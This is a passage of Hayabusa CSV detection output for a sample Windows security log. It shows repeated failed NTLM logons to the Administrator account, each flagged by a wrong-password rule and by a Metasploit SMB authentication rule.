Password,User: Administrator : Type: 3 : Workstation: 8Mu7amiHAg0l7bza : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JdG6F697kAXFDx9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jY5AAnfQMH3VZQUa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVep4j7jZZAOAQAj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KWWtGIQx8jBgAeoH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zn8X8gen8gX9i3QK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9OdUM99RBHzwgVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJbBVm6wDrqyQmpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAVRBfMxIyrfsEtR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wuCIClZihRxRyjGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: yxhpEP6nnmihvkHB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1HYmJDrWmKjj8DF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V81dIfR2SRNDk3a2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vaZpLaxB1kcCXqHP : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRhs8IoV6R6vyCdL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wUYds3Ym3G2abrV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmBfxm6pPLlSEsUI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VbAuqFggx0zz5iEn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cytpVOjb4KrNaGg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BFFFt7eFzmlzbHhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AJQBZZiNKVGXzx4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gyu6EyrtbyowTfC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aASpkRuPfE8Nl64n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MSI2b7LpZpWO3xJW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avNkOq3fsGN3yYJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wnlgy6dW33tRk6UX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: msJ8QrqMluTeUlM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H33NuKduMuskxL0D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BHjp69CD1ttbaK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uxByLPApvfeIhU2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6g0WOAnoGpKyEyzW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P8MTs4Nkbm3ryqcp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Nyd7tr3y0BHmPLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J5KiDQOEnDf6xEPN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3MBP1buuRcBRiQTG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXdcg3MSqnGSvax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kej7zgIDCNR5tnnp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM8SOeQXwytB6iw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XPNATM0IL05vtbZ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H56ci5gbBVzebS2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6rRofLg1uxrojU7n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MAhtwTU8OttAhcxf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CwKgAR6OWbkFlxUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lNZR4G0DVsXVg4A9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZG99tl0RRN3cQoK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nwRzAutxa07Y1xE4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OwhvrVBSRa8RcCKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
